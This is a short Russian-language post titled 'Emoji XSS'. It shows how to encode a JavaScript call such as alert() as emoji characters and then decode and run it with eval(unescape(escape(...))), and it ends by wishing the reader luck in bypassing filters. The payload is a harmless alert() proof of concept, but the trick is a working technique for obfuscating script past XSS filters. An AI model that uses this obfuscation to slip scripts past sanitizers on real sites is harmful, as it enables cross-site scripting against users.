Emoji XSS
[...'alert()'].map(z=>String.fromCodePoint(z.charCodeAt(0)+0x1f400)).join('')
"👡👬👥👲👴🐨🐩"
eval(unescape(escape('👡👬👥👲👴🐨🐩').replace(/u.{8}/g,'')))
охапка дров, alert готов
Немного деталей про происходящую магию
При replac'e мы забираем из кода символа его "аналог" в нужном нам диапазоне
После чего и его мы декодим из юникода и получаем читабельный символ
Полное описание со всеми вакханалиями можно прочитать тут:
https://www.stefanjudis.com/blog/hidden-messages-in-javascript-property-names/
Удачных обходов фильтров;)